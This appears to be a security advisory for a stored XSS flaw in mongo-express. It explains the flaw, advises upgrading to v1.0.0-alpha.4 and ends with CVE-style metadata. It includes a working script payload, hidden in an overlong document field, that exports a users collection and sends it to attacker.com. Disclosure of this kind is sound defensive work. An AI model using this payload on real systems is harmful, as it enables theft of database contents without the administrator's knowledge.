Two kinds of XSS were found:
As an example of type 1 attack, an unauthorized user who only can send a large amount of data in a field of a document may use this payload:
{"someField": "long string here to surpass the limit of document ...... <script> await fetch('http://localhost:8081/db/testdb/export/users').then( async res => await fetch('http://attacker.com?backup='+encodeURIComponent((await res.text())))) </script>" }
This will send an export of a collection to the attacker without even admin knowing. Other types of attacks such as dropping a database\collection are also possible.
Upgrade to v1.0.0-alpha.4
If you have any questions or comments about this advisory: * Open an issue in mongo-express * Email me at jafar.akhoondali@gmail.com
{ "nvd_published_at": "2021-06-21T19:15:00Z", "github_reviewed_at": "2021-06-21T17:53:12Z", "severity": "HIGH", "github_reviewed": true, "cwe_ids": [ "CWE-79" ] }